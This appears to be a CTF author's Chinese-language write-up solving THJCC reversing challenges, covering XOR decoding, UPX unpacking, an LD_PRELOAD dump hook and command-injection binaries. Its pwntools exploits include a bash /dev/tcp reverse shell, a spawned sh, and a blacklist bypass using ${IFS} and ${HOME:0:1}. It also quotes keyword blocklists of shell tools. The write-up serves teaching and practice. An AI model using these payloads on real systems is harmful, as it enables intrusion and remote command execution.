資安

THJCC 我出的題目官方解

Super baby reverse

先 file 看看檔案類型

1
2
3
alvin@suiseiiscute ~/Downloads> file THJCC_Super_Baby_Reverse 
THJCC_Super_Baby_Reverse: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=643efc950df55d8188e8eeac2c0f5f1781f62a35, for GNU/Linux 4.4.0, not stripped
alvin@suiseiiscute ~/Downloads>

ELF 檔案 接著丟 ida
image

Flag: THJCC{BaBY_r3v3rs3_f0r_beggin3r}

Fllllllag_ch3cker_again?

老樣子 先file 看看檔案類型

1
2
alvin@suiseiiscute ~/Downloads> file chal 
chal: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ea4ad0bf1d4644b0983b528a245a6ad728accef4, for GNU/Linux 4.4.0, not stripped

一樣是 ELF 接著丟 ida

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rbx
  __int64 v4; // rax
  char v6; // [rsp+Fh] [rbp-E1h] BYREF
  unsigned __int64 i; // [rsp+10h] [rbp-E0h]
  __int64 v8; // [rsp+18h] [rbp-D8h]
  __int64 v9; // [rsp+20h] [rbp-D0h]
  char *v10; // [rsp+28h] [rbp-C8h]
  _BYTE v11[32]; // [rsp+30h] [rbp-C0h] BYREF
  _BYTE v12[32]; // [rsp+50h] [rbp-A0h] BYREF
  _BYTE v13[33]; // [rsp+70h] [rbp-80h] BYREF
  _QWORD v14[2]; // [rsp+91h] [rbp-5Fh] BYREF
  char v15; // [rsp+A1h] [rbp-4Fh]
  __int16 v16; // [rsp+A2h] [rbp-4Eh]
  int v17; // [rsp+A4h] [rbp-4Ch]
  __int64 v18; // [rsp+A8h] [rbp-48h]
  __int64 v19; // [rsp+B0h] [rbp-40h]
  _WORD v20[5]; // [rsp+B8h] [rbp-38h]
  __int64 v21; // [rsp+C2h] [rbp-2Eh]
  unsigned __int64 v22; // [rsp+D8h] [rbp-18h]

  v22 = __readfsqword(0x28u);
  v15 = 32;
  v16 = 12411;
  v17 = 3295772;
  v18 = 0x62600072F5E0127LL;
  v19 = 0x72A2C022D40475BLL;
  v20[0] = 23809;
  *(_QWORD *)&v20[1] = 0x4355370429703438LL;
  v21 = 0x2261582C00145F36LL;
  v8 = 42;
  strcpy((char *)v14, "Th1s_1s_th3_k3y");
  v9 = 15;
  std::vector<unsigned char>::vector(v11, argv);
  std::vector<unsigned char>::reserve(v11, 42);
  for ( i = 0; i <= 0x29; ++i )
  {
    v6 = *((_BYTE *)&v14[1] + i + 7) ^ *((_BYTE *)v14 + i % 0xF);
    std::vector<unsigned char>::push_back(v11, &v6);
  }
  v10 = &v6;
  v3 = std::vector<unsigned char>::size(v11);
  v4 = std::vector<unsigned char>::data(v11);
  std::string::basic_string(v12, v4, v3, &v6);
  std::__new_allocator<char>::~__new_allocator(&v6);
  std::operator<<<std::char_traits<char>>(&std::cout, "Please Enter the flag: ");
  std::string::basic_string(v13);
  std::operator>><char>(&std::cin, v13);
  if ( (unsigned __int8)std::operator==<char>(v13, v12) )
    std::operator<<<std::char_traits<char>>(&std::cout, "Yes\n");
  else
    std::operator<<<std::char_traits<char>>(&std::cout, "You are wrong\n");
  std::string::~string(v13);
  std::string::~string(v12);
  std::vector<unsigned char>::~vector(v11);
  return 0;
}

看 code 發現他就是個簡單 XOR

exploit.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from struct import pack

key = b"Th1s_1s_th3_k3y"

mem = b""
mem += b"\x00"*16
mem += pack("<B", 32)                
mem += pack("<H", 12411)             
mem += pack("<I", 3295772)           
mem += pack("<Q", 0x062600072F5E0127) 
mem += pack("<Q", 0x72A2C022D40475B) 
mem += pack("<H", 23809)           
mem += pack("<Q", 0x4355370429703438) 
mem += pack("<Q", 0x2261582C00145F36) 
start = 15
encoded = mem[start:start+42]

flag = bytes(encoded[i] ^ key[i % len(key)] for i in range(42))

print("Flag:", flag.decode())

Flag: THJCC{A_Simpl3_R3v3r3_using_CPP_d0ing_X0R}

THJCC-anti-virus

一樣先 file 看 檔案類型

1
2
alvin@suiseiiscute ~/Downloads> file anti-virus  
anti-virus: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), BuildID[sha1]=941cf74268f185eb39affa81282019cf64be1e95, for GNU/Linux 4.4.0, statically linked, no section header

好 ELF 看到 no section header 覺得怪怪的
binwalk 看看

1
2
3
4
5
6
7
8
9
10
11
12
alvin@suiseiiscute ~/Downloads> binwalk anti-virus 

                                                                 /home/alvin/Downloads/anti-virus
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
DECIMAL                            HEXADECIMAL                        DESCRIPTION
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
0                                  0x0                                ELF binary, 64-bit shared object, AMD X86-64 for System-V (Unix), little endian
7118                               0x1BCE                             Copyright text: "Copyright (C) 1996-2025 the UPX Team. All Rights Reserved. $ "
-------------------------------------------------------------------------------------------------------------------------------------------------------------------

Analyzed 1 file for 85 file signatures (187 magic patterns) in 15.0 milliseconds
alvin@suiseiiscute ~/Downloads>

看到

1
Copyright text: "Copyright (C) 1996-2025 the UPX Team. All Rights Reserved. $ "

這段,發現被 upx 加殼過了
解殼就好

1
2
3
4
5
6
7
8
9
10
alvin@suiseiiscute ~/Downloads> upx -d anti-virus -o anti-virus-unpacked
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2026
UPX 5.1.0       Markus Oberhumer, Laszlo Molnar & John Reiser    Jan 7th 2026

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     16136 <-      8572   53.12%   linux/amd64   anti-virus-unpacked

Unpacked 1 file.

接著丟 IDA 逆向

1
2
3
4
5
6
7
8
9
10
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  puts("=== THJCC Anti-Virus ===");
  puts("This a anti-virus meow please enter something to check if it is a virus: ");
  start_challenge();
  return 0;
}

在 main function 我們會看到他去 call start_challenge 這個 function
那 分析一下 start_challenge 在幹嘛吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
unsigned __int64 start_challenge()
{
  int i; // [rsp+8h] [rbp-228h]
  int v2; // [rsp+Ch] [rbp-224h]
  _BYTE s[7]; // [rsp+10h] [rbp-220h] BYREF
  unsigned __int8 v4; // [rsp+17h] [rbp-219h] BYREF
  char v5[264]; // [rsp+18h] [rbp-218h] BYREF
  char command[264]; // [rsp+120h] [rbp-110h] BYREF
  unsigned __int64 v7; // [rsp+228h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  memset(s, 0, 0x108u);
  if ( read(0, s, 7u) == 7 )
  {
    if ( read(0, &v4, 1u) == 1 )
    {
      v2 = read(0, v5, v4);
      if ( v2 == v4 )
      {
        if ( (unsigned int)check_command(s) )
        {
          for ( i = 0; i < v4; ++i )
            command[i] = (i - 84) ^ v5[i];
          command[v4] = 0;
          puts("Verification successful. Executing binary...");
          system(command);
        }
      }
      else
      {
        printf("Error: Data length mismatch. Expected %d, got %d\n", v4, v2);
      }
    }
    else
    {
      puts("Error: Failed to read length.");
    }
  }
  else
  {
    puts("Error: Failed to read magic header.");
  }
  return v7 - __readfsqword(0x28u);
}

簡單來講 他就是一個 function 去判斷你輸入的東西 然後呢,你輸入的東西要 XOR 過 並且同時還需要一個 magic header 才能驗証通過,驗証通過後 = RCE
那 magic header 呢? 看到有 call 一個 check_command function 追下去

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
_BOOL8 __fastcall check_command(__int64 a1)
{
  int i; // [rsp+1Ch] [rbp-114h]
  char haystack[264]; // [rsp+20h] [rbp-110h] BYREF
  unsigned __int64 v4; // [rsp+128h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  if ( strncmp((const char *)a1, "THJCCAV", 7u) )
    return 0;
  if ( *(_BYTE *)(a1 + 7) <= 9u )
    return 0;
  if ( memmem((const void *)(a1 + 8), *(unsigned __int8 *)(a1 + 7), &unk_2010, 3u) )
    return 0;
  for ( i = 0; i < *(unsigned __int8 *)(a1 + 7); ++i )
    haystack[i] = (i - 84) ^ *(_BYTE *)(a1 + i + 8);
  haystack[*(unsigned __int8 *)(a1 + 7)] = 0;
  if ( !strstr(haystack, "system")
    && !strstr(haystack, "exec")
    && !strstr(haystack, "/bin/sh")
    && !strstr(haystack, "cat")
    && !strstr(haystack, "ls")
    && !strstr(haystack, "flag")
    && !strstr(haystack, "base64")
    && !strstr(haystack, "perl")
    && !strstr(haystack, "python")
    && !strstr(haystack, "php")
    && !strstr(haystack, "echo")
    && !strstr(haystack, "ncat")
    && !strstr(haystack, "nc ")
    && !strstr(haystack, "curl")
    && !strstr(haystack, "rcat") )
  {
    return strlen(haystack) == *(unsigned __int8 *)(a1 + 7);
  }
  puts("You are a bad guy no malware : ( ");
  return 0;
}

發現 magic header 要放 THJCCAV

並且要繞過

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
if ( !strstr(haystack, "system")
    && !strstr(haystack, "exec")
    && !strstr(haystack, "/bin/sh")
    && !strstr(haystack, "cat")
    && !strstr(haystack, "ls")
    && !strstr(haystack, "flag")
    && !strstr(haystack, "base64")
    && !strstr(haystack, "perl")
    && !strstr(haystack, "python")
    && !strstr(haystack, "php")
    && !strstr(haystack, "echo")
    && !strstr(haystack, "ncat")
    && !strstr(haystack, "nc ")
    && !strstr(haystack, "curl")
    && !strstr(haystack, "rcat") )

這串 才能打 RCE
接著 條件都有了 來搓 exploit 吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

from pwn import * 

#r = process('./anti-virus')
r = remote('23.146.248.143', 1145)

magic = b'THJCCAV'
cmd = b"bash -c 'bash -i 5<> /dev/tcp/IP/9998 0<&5 1>&5 2>&5'"
length = len(cmd)

encoded_cmd = b""

key_base = 0xAC 
for i in range(length):
    key = (i + key_base) % 0xFF  
    encoded_cmd += bytes([cmd[i] ^ key])

payload = magic
payload += p8(length)
payload += encoded_cmd

r.sendline(payload)  
r.interactive()

這題是透過 Reverse shell 去打,但不是每個人都有 Reverse shell
所以有第二個 exploit (感謝 Grissia)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
context.log_level = "debug"

def encrypt_command(command: str) -> bytes:
    encrypted_bytes = []
    for i, char in enumerate(command):
        key_value = i - 0x54
        key_byte = key_value & 0xFF

        char_value = ord(char)
        encrypted_byte = char_value ^ key_byte
        encrypted_bytes.append(encrypted_byte)

    return bytes(encrypted_bytes)

r = remote("chal.thjcc.org", 1145)
# r = process("./unpacked")

r.sendlineafter(b"virus: \n", b"THJCCAV")
payload = encrypt_command("sh        ")

r.send(payload)

r.interactive()

Flag: THJCC{An_3a3y_Ant1_Viru5_H0p3_y0u_enj0y_it}

幽々子の食べ物

這題我只出第一關的 VMP 所以我只會講解第一 part

decompile 後我們可以注意到幾個重點

1
2
3
4
5
6
v3 = getenv("VMP_SKIP_AD");
if ( (!v3 || *v3 != 49) && ptrace(PTRACE_TRACEME, 0, 1, 0) < 0 )
{
  fwrite("Debugger detected!\n", 1u, 0x13u, stderr);
  return 1;
}

這邊是個 anti-debug 除非 VMP_SKIP_AD = 1

接著

1
2
3
4
5
6
7
8
v6 = (unsigned __int8 *)malloc(0x40FB0u);
v7 = v6;
if ( !v6 )
{
  fwrite("malloc failed\n", 1u, 0xEu, stderr);
  return 1;
}
memcpy(v6, &unk_402160, 0x40FB0u);
  • 分配一塊大 buffer buf = malloc(0x40FB0)
  • 用 unk_402160 初始化(payload 初始 blob)

並且 看到

1
2
3
4
5
6
7
8
9
10
11
12
13
v9 = (char *)memcpy(v8, &unk_443114, n);
v10 = v9;
v11 = 0;
v12 = &v9[n];
v13 = 1099788796;
do
{
  v14 = *v10++;
  v15 = v11 ^ v14;
  v11 += 17;
  v13 = 1664525 * v13 + 1013904223;
  *(v10 - 1) = HIBYTE(v13) ^ v15;
}

會得知 他是 XOR / LCG stream cipher 去解密 120 bytes 的 VM bytecode

所以就生了個 hook 去把東西 unpack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#define _GNU_SOURCE
#include <dlfcn.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

static int g_target_fd = -1;
static int g_out_fd = -1;
static off_t g_off = 0;

static const char *get_out_path(void) {
    const char *p = getenv("DUMP_OUT");
    return (p && *p) ? p : "./vm_blob.bin";
}

static const char *get_memfd_name(void) {
    const char *n = getenv("DUMP_MEMFD_NAME");
    return (n && *n) ? n : "vm_blob";
}

static void ensure_out_open(void) {
    if (g_out_fd >= 0) return;
    const char *out = get_out_path();
    g_out_fd = open(out, O_CREAT | O_WRONLY | O_TRUNC, 0644);
    if (g_out_fd < 0) {
        fprintf(stderr, "[dump] open(%s) failed: %s\n", out, strerror(errno));
    } else {
        fprintf(stderr, "[dump] dumping to %s\n", out);
    }
}

int memfd_create(const char *name, unsigned int flags) {
    static int (*real_memfd_create)(const char *, unsigned int) = NULL;

    if (!real_memfd_create) {
        real_memfd_create = dlsym(RTLD_NEXT, "memfd_create");
    }

    int fd;
    if (real_memfd_create) fd = real_memfd_create(name, flags);
    else fd = (int)syscall(SYS_memfd_create, name, flags);

    if (fd >= 0 && name && strcmp(name, get_memfd_name()) == 0) {
        g_target_fd = fd;
        g_off = 0;
        ensure_out_open();
        fprintf(stderr, "[dump] captured memfd_create(name=%s) -> fd=%d\n", name, fd);
    }
    return fd;
}

ssize_t write(int fd, const void *buf, size_t count) {
    static ssize_t (*real_write)(int, const void *, size_t) = NULL;
    if (!real_write) real_write = dlsym(RTLD_NEXT, "write");

    ssize_t r = real_write(fd, buf, count);

    if (fd == g_target_fd && r > 0) {
        ensure_out_open();
        if (g_out_fd >= 0) {
            ssize_t w = pwrite(g_out_fd, buf, (size_t)r, g_off);
            if (w < 0) {
                fprintf(stderr, "[dump] pwrite failed: %s\n", strerror(errno));
            } else {
                g_off += w;
            }
        }
    }
    return r;
}

int fexecve(int fd, char *const argv[], char *const envp[]) {
    static int (*real_fexecve)(int, char *const[], char *const[]) = NULL;
    if (!real_fexecve) real_fexecve = dlsym(RTLD_NEXT, "fexecve");

    if (fd == g_target_fd) {
        fprintf(stderr, "[dump] fexecve on target fd=%d (dump should be complete)\n", fd);
        if (g_out_fd >= 0) fsync(g_out_fd);
    }
    return real_fexecve(fd, argv, envp);
}

int close(int fd) {
    static int (*real_close)(int) = NULL;
    if (!real_close) real_close = dlsym(RTLD_NEXT, "close");

    if (fd == g_target_fd) {
        fprintf(stderr, "[dump] closing target fd=%d (total dumped=%lld bytes)\n",
                fd, (long long)g_off);
        g_target_fd = -1;
    }
    if (fd == g_out_fd) g_out_fd = -1;

    return real_close(fd);
}

至於一開始 anti-debugger 怎麽繞

1
export VMP_SKIP_AD=1

這樣就好
編譯

1
gcc -shared -fPIC -O2 -Wall -Wextra -ldl unpacked.c -o unpacked.so

接著

1
2
3
export VMP_SKIP_AD=1
export DUMP_OUT=./unpacked.bin
LD_PRELOAD=$PWD/unpacked.so ./chal

然後就

1
2
file unpacked.bin
unpacked.bin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=28208f69d951f52efc05e9156b3a5742b5e0c7bd, for GNU/Linux 4.4.0, not stripped

image
boom 解完了

THJCC-anti-virus-revange

這題看題目名稱就可以知道是 THJCC-anti-virus 的 revenge 題目 恩對 題目英文拼錯(不是故意的)
好那這題本質上跟上一題差不多,都是要 RCE .w.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
  if ( read(0, s, 7u) == 7 && read(0, &v3, 1u) == 1 && (v1 = read(0, v4, v3), v1 == v3) )
  {
    if ( (unsigned int)sub_2376(s) )
    {
      sub_2223(v4, command, v3);
      puts("Verification successful. Executing...");
      system(command);
    }
  }
  else
  {
    puts("Error");
  }
  return v6 - __readfsqword(0x28u);
}

那這個 function 是判斷能否 executing command
一樣發現

1
2
if ( strncmp((const char *)a1, "THJCCAV", 7u) )
    return 0;

一樣發現 magic header 需要 THJCC AV
並且 sub_2223

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
unsigned __int64 __fastcall sub_2223(__int64 a1, __int64 a2, int a3)
{
  unsigned __int8 v5; // [rsp+25h] [rbp-11Bh]
  unsigned int i; // [rsp+28h] [rbp-118h]
  int j; // [rsp+2Ch] [rbp-114h]
  _BYTE v8[264]; // [rsp+30h] [rbp-110h]
  unsigned __int64 v9; // [rsp+138h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  v5 = 0;
  for ( i = 0; (int)i < a3; ++i )
  {
    v8[i] = sub_21C9(i, v5) ^ *(_BYTE *)((int)i + a1);
    v5 = *(_BYTE *)((int)i + a1);
  }
  for ( j = 0; j < a3; ++j )
    *(_BYTE *)(j + a2) = (v8[j] >> 5) | (8 * v8[j]);
  *(_BYTE *)(a3 + a2) = 0;
  return v9 - __readfsqword(0x28u);
}

定義:

C[i] = in[i]:ciphertext byte

prev = C[i-1],且 prev=0 當 i=0

K(i, prev) = sub_21C9(i, prev)

T[i] = v8[i]:中間值

則:

T[i]=K(i,C[i1])C[i]T[i]=K(i,C[i−1])⊕C[i]

並且
*(_BYTE *)(j + a2) = (v8[j] >> 5) | (8 * v8[j]);
這段是在做位元旋轉

P[i]=ROL8(T[i],3)P[i]=ROL8(T[i],3)

1
2
3
4
char __fastcall sub_21C9(int a1, char a2)
{
  return (a2 ^ 0x5A) & 0x3F ^ byte_3010[a1 % 16] ^ (107 * a1 - 84);
}

這個 function
是在
K(i,prev)=(((prev0x5A)&0x3F)byte3010[imod16](107i84))mod256K(i,\mathrm{prev})=\Big(\big((\mathrm{prev}\oplus\mathtt{0x5A})\mathbin{\&}\mathtt{0x3F}\big)\oplus \mathrm{byte}_{3010}[\,i\bmod 16\,]\oplus(107i-84)\Big)\bmod 256

byte_3010

1
2
3
.rodata:0000000000003010 byte_3010       db 3Fh, 7Ah, 1Dh, 0E2h, 55h, 0B8h, 0Ch, 91h, 4Eh, 0D3h
.rodata:0000000000003010                                         ; DATA XREF: sub_21C9+33↑o
.rodata:000000000000301A                 db 26h, 79h, 0AAh, 1Fh, 63h, 8Bh

然後
在 .data 裡有被 blacklist 的 字元

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
data:0000000000005080 off_5080        dq offset aSystem_0     ; DATA XREF: sub_2376+D4↑o
.data:0000000000005080                                         ; "system"
.data:0000000000005088                 dq offset aExec         ; "exec"
.data:0000000000005090                 dq offset aSh           ; "sh"
.data:0000000000005098                 dq offset aBash         ; "bash"
.data:00000000000050A0                 dq offset aZsh          ; "zsh"
.data:00000000000050A8                 dq offset aFish         ; "fish"
.data:00000000000050B0                 dq offset aDash         ; "dash"
.data:00000000000050B8                 dq offset aBin          ; "/bin"
.data:00000000000050C0                 dq offset aUsr          ; "/usr"
.data:00000000000050C8                 dq offset aEtc          ; "/etc"
.data:00000000000050D0                 dq offset aProc         ; "/proc"
.data:00000000000050D8                 dq offset aDev          ; "/dev"
.data:00000000000050E0                 dq offset aCat          ; "cat"
.data:00000000000050E8                 dq offset aLs           ; "ls"
.data:00000000000050F0                 dq offset aFind         ; "find"
.data:00000000000050F8                 dq offset aGrep         ; "grep"
.data:0000000000005100                 dq offset aAwk          ; "awk"
.data:0000000000005108                 dq offset aSed          ; "sed"
.data:0000000000005110                 dq offset aFlag         ; "flag"
.data:0000000000005118                 dq offset aBase64       ; "base64"
.data:0000000000005120                 dq offset aPerl         ; "perl"
.data:0000000000005128                 dq offset aPython       ; "python"
.data:0000000000005130                 dq offset aPhp          ; "php"
.data:0000000000005138                 dq offset aRuby         ; "ruby"
.data:0000000000005140                 dq offset aLua          ; "lua"
.data:0000000000005148                 dq offset aNode         ; "node"
.data:0000000000005150                 dq offset aJava         ; "java"
.data:0000000000005158                 dq offset aGcc          ; "gcc"
.data:0000000000005160                 dq offset aMake         ; "make"
.data:0000000000005168                 dq offset aEcho         ; "echo"
.data:0000000000005170                 dq offset aPrintf       ; "printf"
.data:0000000000005178                 dq offset aNc           ; "nc"
.data:0000000000005180                 dq offset aNcat         ; "ncat"
.data:0000000000005188                 dq offset aCurl         ; "curl"
.data:0000000000005190                 dq offset aWget         ; "wget"
.data:0000000000005198                 dq offset aSsh          ; "ssh"
.data:00000000000051A0                 dq offset aFtp          ; "ftp"
.data:00000000000051A8                 dq offset aXxd          ; "xxd"
.data:00000000000051B0                 dq offset aOd           ; "od"
.data:00000000000051B8                 dq offset aStrings      ; "strings"
.data:00000000000051C0                 dq offset aHexdump      ; "hexdump"
.data:00000000000051C8                 dq offset aDd           ; "dd"
.data:00000000000051D0                 dq offset aCp           ; "cp"
.data:00000000000051D8                 dq offset aMv           ; "mv"
.data:00000000000051E0                 dq offset aChmod        ; "chmod"
.data:00000000000051E8                 dq offset aChown        ; "chown"
.data:00000000000051F0                 dq offset aLn           ; "ln"
.data:00000000000051F8                 dq offset aTar          ; "tar"
.data:0000000000005200                 dq offset aZip          ; "zip"
.data:0000000000005208                 dq offset aGzip         ; "gzip"
.data:0000000000005210                 dq offset aBzip         ; "bzip"
.data:0000000000005218                 dq offset aEnv          ; "env"
.data:0000000000005220                 dq offset aExport       ; "export"
.data:0000000000005228                 dq offset aPrintenv     ; "printenv"
.data:0000000000005230                 dq offset aSet          ; "set"
.data:0000000000005238                 dq offset aId           ; "id"
.data:0000000000005240                 dq offset aWhoami       ; "whoami"
.data:0000000000005248                 dq offset aUname        ; "uname"
.data:0000000000005250                 dq offset aHostname     ; "hostname"
.data:0000000000005258                 dq offset aPs           ; "ps"
.data:0000000000005260                 dq offset aTop          ; "top"
.data:0000000000005268                 dq offset aKill         ; "kill"
.data:0000000000005270                 dq offset aPkill        ; "pkill"
.data:0000000000005278                 dq offset aRm           ; "rm"
.data:0000000000005280                 dq offset aMkdir        ; "mkdir"
.data:0000000000005288                 dq offset aRmdir        ; "rmdir"
.data:0000000000005290                 dq offset aMore         ; "more"
.data:0000000000005298                 dq offset aLess         ; "less"
.data:00000000000052A0                 dq offset aHead         ; "head"
.data:00000000000052A8                 dq offset aTail         ; "tail"
.data:00000000000052B0                 dq offset aSort         ; "sort"
.data:00000000000052B8                 dq offset aUniq         ; "uniq"
.data:00000000000052C0                 dq offset aCut          ; "cut"
.data:00000000000052C8                 dq offset aTr           ; "tr"
.data:00000000000052D0                 dq offset aTee          ; "tee"
.data:00000000000052D8                 dq offset aXargs        ; "xargs"
.data:00000000000052E0                 dq offset aRead_0       ; "read"
.data:00000000000052E8                 dq offset asc_31CC      ; "/"
.data:00000000000052F0                 dq offset asc_31CE      ; " "

那 有解密規則跟被 ban 的字元了
我們來看環境吧

1
2
RUN mv /flag.txt /flag-$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1).txt
RUN chmod 444 /flag-*.txt

這段讓 flag 有接上隨機字元 並且有擋 flag 所以我們可以使用 fl* 來解覺問題
並且有 ban cat 我們可以用 tac 來解覺這個問題,
此外 我還有把 / ban 掉,這時候可以用 ${IFS} 代替空格 ${HOME:0:1} 代替 /

來搓 exploit 吧

exploit.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from pwn import *
r = remote("chal.thjcc.org", 14712)

key_table = [
    0x3F, 0x7A, 0x1D, 0xE2, 0x55, 0xB8, 0x0C, 0x91,
    0x4E, 0xD3, 0x26, 0x79, 0xAA, 0x1F, 0x63, 0x8B
]

def compute_key(i, prev):
    a = (i * 0x6B + 0xAC) & 0xFF
    b = key_table[i % 16]
    c = (prev ^ 0x5A) & 0x3F
    return a ^ b ^ c

def encode(command: str) -> bytes:
    cmd = command.encode()
    
    layer1 = []
    for c in cmd:
        ror3 = ((c >> 3) | (c << 5)) & 0xFF
        layer1.append(ror3)
    
    encrypted = []
    prev = 0x00
    for i, c in enumerate(layer1):
        key = compute_key(i, prev)
        enc_byte = c ^ key
        encrypted.append(enc_byte)
        prev = enc_byte
    
    return bytes(encrypted)

def build_packet(command: str) -> bytes:
    payload = encode(command)
    length = len(payload)
    assert 10 <= length <= 256, f"Command length {length} out of range"
    
    packet = b"THJCCAV" + bytes([length]) + payload
    return packet

command = "tac${IFS}${HOME:0:1}fl*" 

packet = build_packet(command)

banner = r.recvuntil(b"Enter data:\n")
r.info(f"Banner:\n{banner.decode()}")

r.send(packet)

r.interactive()

Flag: THJCC{t4c_t4c_d1d_y0u_r3v3rs3_c4t???}

image